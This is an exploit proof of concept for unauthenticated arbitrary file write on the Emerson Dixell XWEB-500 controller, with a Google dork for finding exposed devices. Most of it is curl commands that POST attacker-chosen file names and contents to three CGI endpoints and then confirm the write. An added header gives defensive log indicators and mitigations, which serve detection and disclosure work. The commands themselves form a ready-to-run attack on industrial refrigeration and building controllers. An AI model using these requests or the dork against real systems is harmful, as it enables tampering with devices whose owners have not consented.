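# Exploit Title: Dixell XWEB-500 - Arbitrary File Write
# Google Dork: inurl:"xweb500.cgi"
# Date: 03/01/2022
# Exploit Author: Roberto Palamaro
# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
# Version: XWEB-500
# Tested on: Dixell XWEB-500
# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/
#
# Emerson Dixell XWEB-500 is affected by multiple arbitrary file write
# vulnerabilities. Three CGI endpoints take the destination file name and the
# file content from the POST body itself.
#
# Layout note: in the extracted listing the comments and commands were fused
# together ('"-X', '@--H', '-is"http', a '#' glued to the preceding quote), so
# the shell no longer split the options where the author intended. The token
# boundaries are restored below; endpoints, options and body lines are the
# author's. printf emits the same bytes as the original 'echo -e' without
# depending on the shell's echo implementation.
#
# [target] and [port] are placeholders for a device you are authorised to test.
#
# Reviewer notes (defensive):
#   - None of the requests below sends a cookie, token or credentials.
#   - What to look for in proxy / web-server logs: POST requests to
#     /cgi-bin/logo_extra_upload.cgi, /cgi-bin/lo_utils.cgi and
#     /cgi-bin/cal_save.cgi with Content-Type: application/octet-stream,
#     especially from hosts that are not the operator's workstation, and
#     files appearing under /logo/ that the operator did not upload.
#   - The PoC sends the literal User-Agent "Chrome" (-A Chrome); it is
#     trivially changed, so treat it as a weak indicator only.
#   - Mitigation: keep the device's web interface off untrusted networks
#     (segmentation, VPN or ACLs in front of it) and check the report linked
#     above and the vendor for fixed firmware. TODO confirm fixed version;
#     none is stated on this page.

# Endpoint: logo_extra_upload.cgi
# The first line of the body is the file name and the second one is the
# content of the file to be written.
# Write file
printf '%s\n' 'file.extension' 'content' \
  | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" \
      -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Verify
curl -A Chrome -is "http://[target]:[port]/logo/"

# Endpoint: lo_utils.cgi
# Here ACTION=5 enables write mode; the file name and content follow it.
printf '%s\n' 'ACTION=5' 'file.extension' 'content' \
  | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" \
      -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Verify using ACTION=3 to list resources
printf '%s\n' 'ACTION=3' \
  | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" \
      -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Endpoint: cal_save.cgi
# The first line of the body is the file name and the second one is the
# content of the file to be written.
printf '%s\n' 'file.extension' 'content' \
  | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" \
      -X POST --data-binary @- -H 'Content-Type: application/octet-stream'

# Verify
# The URL is quoted so the shell does not treat the [..] placeholders as a glob.
curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_dir.cgi"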